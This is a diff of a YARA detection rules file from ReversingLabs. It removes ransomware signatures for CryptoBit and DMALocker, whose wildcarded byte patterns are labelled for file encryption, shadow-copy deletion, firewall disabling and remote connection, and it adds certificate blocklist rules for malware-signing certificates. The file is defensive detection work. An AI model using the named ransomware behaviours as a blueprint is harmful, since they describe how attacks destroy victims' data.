-            ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8
-        }
-		$find_files_p2 = {
-            83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF
-            15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ??
-            89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ??
-            ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80
-            38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ??
-            ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ??
-            2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
-            83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 8B 4D ?? 56 57 89
-            85 ?? ?? ?? ?? 33 FF 33 C0 89 8D ?? ?? ?? ?? 6A ?? 51 89 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 70 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 8A 0E
-            3A 08 75 ?? 84 C9 74 ?? 8A 4E ?? 3A 48 ?? 75 ?? 83 C6 ?? 83 C0 ?? 84 C9 75 ?? 33 C0
-            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8
-            68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 8B 40 ?? 8B F8 E8 ?? ?? ?? ??
-            33 D2 B9 ?? ?? ?? ?? F7 F1 8A 04 3A 88 04 1E 46 83 FE ?? 7C ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 33 C9 23 F9 89 8D ?? ?? ?? ?? 3D ?? ?? ?? ??
-            0F 87 ?? ?? ?? ?? 48 83 E0 ?? 83 C0 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF
-        }
-		$encrypt_files_p2 = {
-            0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ??
-            ?? 83 C4 ?? 33 FF 3B B5 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 3B 85 ?? ?? ?? ?? 0F 85
-            ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ??
-            ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 53 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 85 ?? ?? ??
-            ?? 57 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 57 6A ??
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 3B 85 ?? ?? ?? ?? 75 ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 33 FF 56 E8
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 5B 85 C0 74 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 33 CD
-            5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$disable_fw_and_delete_shadow_volumes = {
-            6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 74 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D7 E9 ?? ??
-            ?? ?? 6A ?? FF 35 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ??
-            50 FF 35 ?? ?? ?? ?? FF D3 6A ?? FF 35 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 8B 48 ?? 51
-            FF 35 ?? ?? ?? ?? FF D3 8B F8 8D 85 ?? ?? ?? ?? 50 FF D6 8D 45 ?? 50 8D 85 ?? ?? ??
-            ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 40 ?? 50 6A ?? FF 95 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ??
-            ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ??
-            FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5d:08:5a:9a:28:85:49:d0:9e:dc:49:41" and 1478757821 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_7D20Dec3797A1Ac30649Ebb184265B79 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "5344bda2-bc11-5700-a0f7-52792c5bb87a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14404-L14420"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "78c0575a1c9ecf37ef5bac0612c20f96b8641875b0ba786979adc8a77f001a5e"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $disable_fw_and_delete_shadow_volumes ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "7d:20:de:c3:79:7a:1a:c3:06:49:eb:b1:84:26:5b:79" and 1474156800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cryptobit : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_187D92861076E469B5B7A19E2A9Fd4Ba : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoBit ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8566e516-9884-5b20-90c4-7ed38fa96999"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "0a156a49-c737-5bdb-9178-34121af490d6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.CryptoBit.yara#L1-L113"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ccc8a0f1c5e11211649992d0f2b309968c97b49f1c7359e62d622f364e117429"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14422-L14438"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7383a7fb31a0a913dff1740015ff702642fbb41d8e5a528a8684c80e66026e9d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoBit"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83
-            7D ?? ?? 75 ?? FF 75 ?? EB ?? 6A ?? 59 83 C9 ?? 83 F1 ?? 89 4D ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 89 45 ?? 60 BE ?? ?? ??
-            ?? 56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 D2
-            8B 0D ?? ?? ?? ?? F7 F1 0B C0 74 ?? FF 35 ?? ?? ?? ?? EB ?? 52 8B 0C 24 29 4D ?? 51
-            FF 75 ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 0B C0 74 ?? 89 45 ?? 51 FF
-            75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 75 ?? 89 45 ?? 89 4D ?? FF 75 ??
-            E8 ?? ?? ?? ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? A1 ?? ?? ??
-            ?? 01 45 ?? EB ?? EB ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64
-            8F 05 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D
-            ?? EB ?? 8B 45 ?? C9 C2
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ??
-            0B C0 74 ?? E9 ?? ?? ?? ?? 89 45 ?? 8B 15 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 83 F8 ??
-            73 ?? E9 ?? ?? ?? ?? EB ?? 0B C9 75 ?? 3B C2 73 ?? 50 EB ?? 52 8F 45 ?? 83 7D ?? ??
-            75 ?? A1 ?? ?? ?? ?? 39 45 ?? 72 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ??
-            ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 89 45 ?? 60 BE ?? ?? ?? ??
-            56 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? FF 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
-            75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 50 8B 4D ?? 8B 04 24 83 C9 ?? 83 F1 ?? 51 50 E8 ??
-            ?? ?? ?? 89 45 ?? 0B C0 74 ?? 6A ?? 50 51 FF 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-            ?? 8B 64 24 ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 61 EB ?? EB ?? 64 8F 05 ?? ?? ?? ?? 83
-            C4 ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 4D ?? EB ?? 33 C0 33 C9 C9 C2
-        }
-		$find_files_p1 = {
-            55 8B EC 83 C4 ?? 57 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 83 7E ?? ?? 75 ?? E8 ?? ?? ?? ?? 50 8D 46 ?? 50 E8
-            ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 35 ?? ?? ?? ?? 8D 46
-            ?? 50 E8 ?? ?? ?? ?? 23 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F
-            84 ?? ?? ?? ?? 89 45 ?? B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 0F 84 ??
-            ?? ?? ?? 89 45 ?? 8B 75 ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 56 E8 ?? ?? ?? ?? 8D 57 ?? 8B
-            47 ?? D1 E0 C7 04 10 ?? ?? ?? ?? C6 44 10 ?? ?? FF 75 ?? 8D 47 ?? 50 E8 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 8B 75 ?? 8B 7D ?? 8B 02 25 ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 02 83 E0 ?? F7 02 ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D 47
-            ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 89 47 ?? F7 02 ?? ?? ?? ??
-            74 ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? FF 77 ?? 8D 47 ?? 50 E8 ?? ?? ?? ??
-            83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 48 50 FF 76 ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 0B C0 75
-        }
-		$find_files_p2 = {
-            0B C9 74 ?? FF 45 ?? E9 ?? ?? ?? ?? 83 7A ?? ?? 0F 84 ?? ?? ?? ?? 81 7A ?? ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F7 02 ?? ?? ?? ?? 0F 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 74 ?? 8B F8 FF 76 ?? 8F 47 ?? FF 76 ??
-            8F 47 ?? FF 36 8F 07 8D 47 ?? 50 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 42 ?? 50 8D
-            47 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 47 ?? 50 E8 ?? ?? ?? ?? 8D 47 ?? 50 E8 ??
-            ?? ?? ?? 89 47 ?? 83 3F ?? 75 ?? 57 68 ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 0B C0 75
-            ?? 57 E8 ?? ?? ?? ?? EB ?? 57 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ??
-            E8 ?? ?? ?? ?? 0B C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8B 75 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            14 24 51 50 52 8D 46 ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 D1 E1 8B 5C 24 ?? 51 50 53 8D 46
-            ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ??
-            ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 5E 5F C9 C2
-        }
-		$remote_connection = {
-            55 8B EC 81 C4 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? 6A ?? FF 75 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 89 85 ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 8D 5D ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 23 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 23 C0 89 85 ?? ?? ?? ?? 74 ??
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? FF B5 ?? ?? ?? ?? 0B C0 74 ?? 83 BD ?? ?? ?? ?? ?? 74 ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? C9 C2
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "18:7d:92:86:10:76:e4:69:b5:b7:a1:9e:2a:9f:d4:ba" and 1476748800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4bb98380-70e5-5ad9-adb2-2e6e10f35258"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14440-L14456"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "39c6efefcbd78d5e08ffd8d3989cab3bdf273a1847b2a961f9e68c9ee95e85b6"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $remote_connection and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Funcall" and pe.signatures [ i ] . serial == "19:9a:94:76:fe:ca:3c:00:4f:f8:89:d3:45:45:de:07" and 1138060800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dmalocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DMALocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ddef0f1-61c9-59f6-a02c-35768c2cd4d6"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "e402e3b4-a598-504d-85b8-8c1994cb51fc"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.DMALocker.yara#L1-L149"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "107dbc4cacd9d451e9c6fe8aa91cd612f70ac767ee70f74f3a77d1e5548b054f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14458-L14474"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f849b6899b6766807cfddf99ecb809fe923f35f04de09b62235da352ce6e6e24"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DMALocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$dmalock_v1_encrypt_files_1 = {
-            83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83
-            F8 ?? 75 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8A 9D ?? ?? ??
-            ?? 33 C0 84 DB 74 ?? EB ?? 8D [2-5] 8A 90 ?? ?? ?? ?? 84 D2 74 ?? 8A 8C 05
-            ?? ?? ?? ?? 3A CA 74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C
-            05 ?? ?? ?? ?? 3A 88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 84 DB 74 ?? 8A 90 ?? ?? ??
-            ?? 84 D2 74 ?? 8A 8C 05 ?? ?? ?? ?? 3A CA
-        }
-		$dmalock_v1_encrypt_files_2 = {
-            EB ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 52 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 8B 4D ?? 5F 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$dmalock_v1_encrypt_files_3 = {
-            74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C 05 ?? ?? ?? ?? 3A
-            88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 8D 95 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? A8 ?? 74 ?? A8 ?? 0F 85 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 56 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 55
-            ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4
-        }
-		$dmalock_v1_enum_shares_and_discs_type_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
-            ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 83 C4 ?? 89 ?? ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? ?? 32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? ??
-            8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 ?? 6A ?? 89 45 ?? 66 89 45 ?? 88 45 ?? 8D 45 ??
-            6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83
